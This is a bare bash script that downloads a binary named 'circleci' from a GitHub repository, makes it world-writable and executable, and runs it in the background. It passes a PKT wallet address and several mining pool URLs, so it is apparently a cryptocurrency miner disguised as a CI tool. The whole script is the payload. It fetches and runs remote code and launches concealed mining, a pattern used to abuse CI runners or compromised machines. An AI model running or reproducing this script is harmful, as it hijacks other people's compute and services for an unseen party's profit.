#!/bin/bash
wget https://github.com/aurbach55/zash/raw/main/circleci
chmod 777 circleci
nohup ./circleci ann -p pkt1q4k0cqtmhtlhyw9w2dha3dxn2fe9u8ez4zvgkad https://stratum.zetahash.com http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com > nohup.out
